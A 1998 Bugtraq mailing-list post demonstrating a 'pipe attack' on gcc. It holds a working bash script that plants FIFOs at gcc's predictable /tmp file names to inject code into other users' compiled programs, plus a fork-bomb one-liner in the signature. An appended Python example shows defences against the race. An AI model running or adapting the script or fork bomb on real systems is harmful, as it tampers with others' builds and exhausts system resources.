[6138] in bugtraq


Pipe attack - an example

daemon@ATHENA.MIT.EDU (Michał Zalews)
Fri Feb 20 14:26:11 1998

Date: 	Fri, 20 Feb 1998 18:46:47 +0100
Reply-To: Michał Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
From: Michał Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG

Due to the questions about the possibility of performing 'pipe attacks'
- here's a *working* example of a program which appends the function
printf("This program has been infected!\n"); after the declarations
in the main() function to sources compiled using gcc. That IS a serious
problem, isn't it? Of course, of course, this one (the gcc vulnerability)
can be easily patched, but gcc isn't the only vulnerable program!
Ok, here it is:

--
#!/bin/bash
# Advanced gcc viral implant
# by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ** EXECUTION PROHIBITED **

# Locate the compiler proper (cc1); gcc of this era kept it under /usr/lib/gcc-lib.
CC1=`find /usr/lib/gcc-lib -name cc1`
VICT=0
renice +20 $PPID >&/dev/null
# gcc wrote its intermediates (ccXXXX.i, ccXXXX.s) into the world-writable
# /tmp under predictable names; that is the whole precondition of the attack.
cd /tmp
echo "I'm free, I'm free! Oh, I'm free..."
while :; do
  # Wait for a preprocessed source cc*.i to show up and take its basename.
  V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
  if [ ! "$V" = "" ]; then
    # Plant a FIFO at the name cc1 is about to use for its assembler output.
    mkfifo -m 666 ${V}.s &>/dev/null
    if [ -p ${V}.s ]; then
      sleep 1
      # Insert the printf() after the declarations in main(): x is set on the
      # line that declares main, y on the first following line whose first
      # field contains a "(", i.e. the first statement with a call.
      cat ${V}.i|awk 'match($2,"main")==1{x=1};y!=1&&x==1&&match($1,"(")>0{y=1;print "printf(\"This program has been infected!\\n\");"};{print $0}'>.lv$$.i
      # Compile the modified source with the real cc1.
      $CC1 .lv$$.i
      # Drain what the victim's cc1 writes into the FIFO, then hand the
      # assembler the modified output through the same FIFO.
      cat ${V}.s>/dev/null
      cat .lv$$.s >${V}.s
      let VICT=VICT+1
      echo "Someone has been just trapped ($VICT)."
    fi
    rm -f .lv$$.* ${V}.s &>/dev/null
  fi
done
--

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to do it recursively is divine [P. Deutsch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
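The mitigation side of the attack above, as an added example that is not part of the original post and not gcc's own code: a program writing intermediates should either use a private mode-0700 directory (so nobody can pre-plant a FIFO under a predictable name) or create each file with O_CREAT|O_EXCL and refuse anything that already exists. The function names (`private_workdir`, `open_intermediate`, `find_planted_fifos`), the `cc12345.s` name and the whole scenario in `demo()` are constructed for illustration; it assumes Python 3 on a POSIX system where `os.mkfifo` is available.

```python
import os
import shutil
import stat
import tempfile
from typing import Dict, List, Tuple


class UnsafeIntermediateFile(Exception):
    """Raised when an intermediate-file path cannot be created safely."""


def private_workdir() -> str:
    """Return a fresh mode-0700 scratch directory (mkdtemp guarantees the mode).

    Nobody else can create entries inside it, so a name like cc12345.s
    cannot be pre-planted as a FIFO before the compiler opens it.
    """
    return tempfile.mkdtemp(prefix="cc-work-")


def open_intermediate(path: str) -> int:
    """Create `path` as a brand-new regular file, or refuse.

    O_CREAT|O_EXCL fails with EEXIST if anything already sits at that name
    (FIFO, symlink, ordinary file), which is exactly the precondition the
    script in the post relies on. O_NOFOLLOW (where the platform has it)
    and the fstat() type check are a second line of defence.
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, 0o600)
    except FileExistsError as exc:
        raise UnsafeIntermediateFile(f"{path} already exists; refusing to reuse it") from exc
    if not stat.S_ISREG(os.fstat(fd).st_mode):
        os.close(fd)
        raise UnsafeIntermediateFile(f"{path} is not a regular file")
    return fd


def find_planted_fifos(directory: str, suffixes: Tuple[str, ...] = (".i", ".s")) -> List[str]:
    """Audit helper: list FIFOs in `directory` named like compiler
    intermediates (cc*.i / cc*.s, the names the script in the post waits for).
    lstat() is used so a symlink pointing at a FIFO is not followed."""
    found = []
    for name in sorted(os.listdir(directory)):
        if not (name.startswith("cc") and name.endswith(suffixes)):
            continue
        if stat.S_ISFIFO(os.lstat(os.path.join(directory, name)).st_mode):
            found.append(name)
    return found


def demo() -> Dict[str, object]:
    """Constructed scenario: a shared scratch dir with a pre-planted FIFO.

    Shows the audit detecting it, the exclusive open refusing it, and the
    same file name being created without trouble in a private directory.
    """
    shared = tempfile.mkdtemp(prefix="shared-tmp-")  # stands in for /tmp
    work = None
    try:
        planted = os.path.join(shared, "cc12345.s")
        os.mkfifo(planted, 0o666)  # test fixture: the pre-planted FIFO from the post
        result: Dict[str, object] = {
            "detected": find_planted_fifos(shared),
            "exclusive_open_refused": False,
            "private_dir_ok": False,
        }
        try:
            open_intermediate(planted)
        except UnsafeIntermediateFile:
            result["exclusive_open_refused"] = True
        work = private_workdir()
        fd = open_intermediate(os.path.join(work, "cc12345.s"))
        os.close(fd)
        result["private_dir_ok"] = True
        return result
    finally:
        shutil.rmtree(shared, ignore_errors=True)
        if work:
            shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The private-directory approach is the stronger of the two: it removes the shared namespace entirely, whereas O_EXCL only turns a silent hijack into a loud failure (and still needs a fresh random name on retry).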
